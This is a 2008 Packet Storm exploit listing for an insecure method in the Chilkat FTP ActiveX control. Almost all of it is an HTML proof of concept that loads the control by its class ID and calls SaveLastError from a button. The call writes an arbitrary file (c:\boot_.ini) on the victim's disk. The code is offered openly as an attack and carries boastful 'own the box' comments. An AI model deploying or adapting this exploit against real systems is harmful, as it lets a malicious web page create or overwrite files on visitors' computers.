Chilkat FTP Active-X Insecure Method

2008-12-31T00:00:00
ID PACKETSTORM:73454
Type packetstorm
Reporter callAX
Modified 2008-12-31T00:00:00

Description

                                        
                                            `<html>  
<title>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2</title><br><br>  
<body>  
<h3>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2 Arbitrary Data Write Exploit</h3>  
  
<!c0d3d by callAX   
*-*-*-*-*  
0wN thE b0x p4l  
*_*-*_*_*  
Greetings to str0ke and Fr0git0-->  
  
<HTML>  
<BODY>  
<object id=ctrl classid="clsid:{3B598BD0-AF50-48C6-B6A5-63261A48B054}"></object>  
  
<SCRIPT>  
  
function Do_it()  
{  
File = "c:\\boot_.ini"  
ctrl.SaveLastError(File)  
}  
  
</SCRIPT>  
<input language=JavaScript onclick=Do_it() type=button value="S3nd me to thls HD">  
</body>  
</HTML>  
  
`